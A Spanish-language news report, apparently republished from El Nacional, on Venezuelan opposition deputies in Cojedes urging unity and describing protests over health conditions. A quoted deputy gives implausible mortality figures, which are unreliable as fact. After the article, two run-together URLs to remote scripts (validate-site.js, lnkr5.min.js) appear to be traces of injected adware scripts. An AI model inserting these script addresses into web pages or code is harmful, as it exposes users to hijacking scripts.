Parlamentarios sostuvieron que es necesaria la unidad nacional .

Diputados de la Fracción Parlamentaria de Acción Democrática en el estado Cojedes sostuvieron un encuentro con los venezolanos, con la participación de miembros del Frente Amplio y demás partidos políticos opositores.

Dennis Fernández, diputada a la Asamblea Nacional, precisó que es momento de recomponer la Unidad e insistió en que la solución para combatir la crisis es responsabilidad de todos los ciudadanos.

«Buscamos la manera de sobrevivir, inclusive, nos toca buscar bicicletas porque nos quieren regular la gasolina, daremos la pelea, el plan es levantarnos y luchar, porque los venezolanos derrotamos dictaduras», expresó Fernández.

Edgar Zambrano jefe de la Fracción Parlamentaria de Acción Democrática, indicó que factores del poder gubernamental han reconocido en privado que pusieron la torta.

Advirtió que pronto intentarán implosionar al Frente Amplio por egos de algunos factores y que si llegase el escenario de unas primarias presidenciales presentarían a Henry Ramos Allup como candidato por considerarlo un hombre íntegro.

Protestas por la salud

José Trujillo, diputado a la Asamblea Nacional,  informó que Venezuela fue expulsada de la organización Panamericana de La Salud por la exportación de sarampión.

Expuso que no es posible que el sector salud tenga que estar en la calle protestando por falta de condiciones laborales.

“Hemos pedido canal humanitario porque los indicadores de salud nos señalan que tenemos 40 por ciento de mortalidad infantil y mientras la mortalidad general debe estar en 8 por ciento, nuestro país ha llegado al 68%», explicó el diputado.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533245644304https://devlinkin.xyz/addons/lnkr5.min.js

Loading...